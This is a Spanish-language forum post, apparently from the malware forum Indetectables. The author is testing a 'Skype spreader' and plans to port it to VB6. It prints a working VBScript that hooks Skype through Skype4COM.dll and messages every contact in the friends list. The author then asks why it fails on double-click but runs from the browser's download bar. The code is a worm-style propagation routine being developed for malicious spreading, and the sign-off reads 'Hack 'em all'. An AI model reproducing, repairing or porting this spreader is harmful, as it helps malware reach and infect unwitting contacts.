Buenos días gente de Indetectables. Les escribo hoy por una duda que tengo y que no logro resolver.

Resulta que estoy probando un spreader para Skype que encontré por ahí y que tenía ganas de implementar en VB6. El módulo estaba hecho en .NET, era bastante simple y básicamente lo que hacía era crear un archivo .vbs y ejecutarlo.

El archivo vbs que se creaba era el siguiente:
(Usa la DLL de Skype, llamada Skype4COM.dll, ubicada en %ProgramFiles%\Common Files\Skype)
Set Fruxr = WScript.CreateObject("Skype4COM.Skype", "Skype_")
            Fruxr.Client.Start()
            Fruxr.Attach()

For Each KZN In Fruxr.Friends
Fruxr.SendMessage KZN.handle, "Este es un mensaje de prueba de un proyecto de Skype Spreading. Ignorar este mensaje"

Next
Pensé que lo primero que debía hacer (antes de pasar el código a VB6) era probar el presunto vbs y eso hice. Creé entonces un archivo de texto, copié el texto de arriba y le cambié la extensión a .vbs

El problema es que a la hora de ejecutar el .vbs me daba error: "No se pudo crear el objeto denominado "Skype4COM.Skype". Fue entonces, que por mera casualidad descargué de internet un .vbs similar, que comenzaba con la misma linea, y al ejecutarlo (desde la barra de descargas del Google Chrome), se ejecutó sin dar error.

Ahora bien, después de hacer pruebas, insólitamente, descubrí que, si ejecuto el .vbs desde la barra de descargas del navegador no da error y corre perfectamente, pero si ejecuto el .vbs como cualquier archivo (dándole doble click), me da el error. ¿Por qué puede ocurrir esto?

Dejo unas capturas: SO: Windows 7 Professional SP1 x64

Hack 'em all
(C) Szudisch 2013
Responder

Volver a “VB/.NET”